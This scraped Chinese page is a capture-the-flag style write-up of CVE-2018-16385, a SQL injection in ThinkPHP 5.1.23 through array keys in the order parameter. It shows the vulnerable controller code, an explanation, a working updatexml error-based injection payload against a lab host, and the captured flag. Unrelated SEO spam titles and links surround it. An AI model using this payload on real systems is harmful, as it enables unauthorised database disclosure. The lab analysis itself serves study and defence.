当前位置: 首页 > news >正文

东莞外贸网站建站湘潭网站seo磐石网络

东莞外贸网站建站,湘潭网站seo磐石网络,郑州市经开区建设局网站,网页游戏排行榜2013前十名目录 漏洞描述 漏洞分析 漏洞复现 漏洞描述 漏洞发现时间#xff1a; 2018-09-04 CVE 参考#xff1a;CVE-2018-16385 最高严重级别#xff1a;低风险 受影响的系统#xff1a;ThinkPHP 5.1.23 漏洞描述#xff1a; ThinkPHP是一款快速、兼容、简单的轻量级国产P…目录 漏洞描述 漏洞分析 漏洞复现 漏洞描述 漏洞发现时间 2018-09-04 CVE 参考CVE-2018-16385 最高严重级别低风险 受影响的系统ThinkPHP 5.1.23 漏洞描述 ThinkPHP是一款快速、兼容、简单的轻量级国产PHP开发矿场解决了大部分应用开发的需求。 该漏洞与程序没有正确过滤数组的Key值导致在public/index/index/test/index中查询字符串时出现SQL注入漏洞有关。攻击者可以利用该漏洞获取数据库中当前用户名等数据。 漏洞分析 ?php namespace app\index\controller;class Test {public function index(){$dataarray();$data[username]array(eq,admin);$orderinput(get.order);//使用input函数进行安全过滤$mdb(user)-where($data)-order($order)-find();dump($m);} } 漏洞原因是处理order by参数时如果参数用户是可控的当参数为数组key value时未正确过滤处理数组的key值就会导致漏洞的产生。 首先定义了一个Test类该类包含一个名为index的公共方法。在该方法中首先创建了一个空数组$data。然后将值为array(eq, admin)的一维数组赋给$data[username]即$data数组中的一个元素。接下来使用input(get.order)语句获取来自GET请求的order参数并将其赋给$order变量。需要注意的是这里使用了input函数对输入数据进行了安全过滤。接下来代码使用$db(user)-where($data)语句查询数据库中满足$data条件的数据。然后使用$order变量对查询结果进行排序最后使用find()方法返回查询结果的第一个匹配项并将其存储在$m变量中。最后使用dump函数打印$m变量的内容。 漏洞复现 payload[!] Name: ThinkPHP5 SQL Injection Vulnerability Sensitive Information Disclosure VulnerabilityScript: thinkphp5_sqli.pyUrl: http://node5.buuoj.cn:29791/Vulnerable: TrueMethod: GETPayload: http://node5.buuoj.cn:29791/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]1 /index.php?ids[0,updatexml(0,concat(0xa,user()),0)]1 经过poc验证此版本的thinkphp存在sql注入漏洞 flag{1ffdbdc4-020e-4d98-bb49-ccabed232769} ThinkPHP5 SQL注入漏洞 PDO真/伪预处理分析 | 离别歌 (leavesongs.com)https://www.leavesongs.com/PENETRATION/thinkphp5-in-sqlinjection.html 具体漏洞分析
http://www.hkea.cn/news/14581029/

相关文章:

  • 公司网站怎样做维护算命网站开发
  • 收录图片的网站上海比较好的网站制作公司
  • 优质的做网站网站构成的作用
  • 网站创建的基本流程加强品牌建设应重点从哪些方面着手
  • 怎么进行网站建设云服务器建设网站用什么系统
  • 如何做网站域名解析建设淘宝客网站
  • 做学历提升的能在哪个网站上宣传中国十大云计算公司排名
  • 盐城网站平台建设贵州网站建设费用
  • 南京建设监理协会网站打不开网站市场做烂了
  • 网站用心国网典型设计最新版
  • 网站模板psd青州网站建设推广
  • 网站建设与管理试题 答案公司形象墙设计
  • 免费自己建立网站辽宁网站建设fengyan
  • 分享信息的网站门户网站字体
  • 做网站被网监叫去很多次优化设计电子版
  • 网站推广计划至少包括国家精品资源共享课程建设网站
  • 城建网站论坛 建设wordpress设置文章字体 插件
  • 中国专门做统计网站苏州培训网站建设
  • 龙岗网站建设-信科网络南京代做网站
  • 北京建设网站光谷网站建设哪家好
  • 电商网站首页字体电商网站开发制作
  • 成都建设网站费用优秀网站设计作品分析
  • 沈阳企业建站模板php网站开发技术训练心得
  • 在线学习软件开发网站建设利用花生壳做网站
  • 如何建设文化企业网站做的网站不能放视频软件
  • 南康家具网站建设济南国画网站济南网站建设公司
  • app拉新怎么做新网站seo外包
  • 建立网站tk网络营销实务教案
  • 长沙专业建网站公司正规职业技能培训机构
  • 网站备案注销申请表建材行业网站建设方案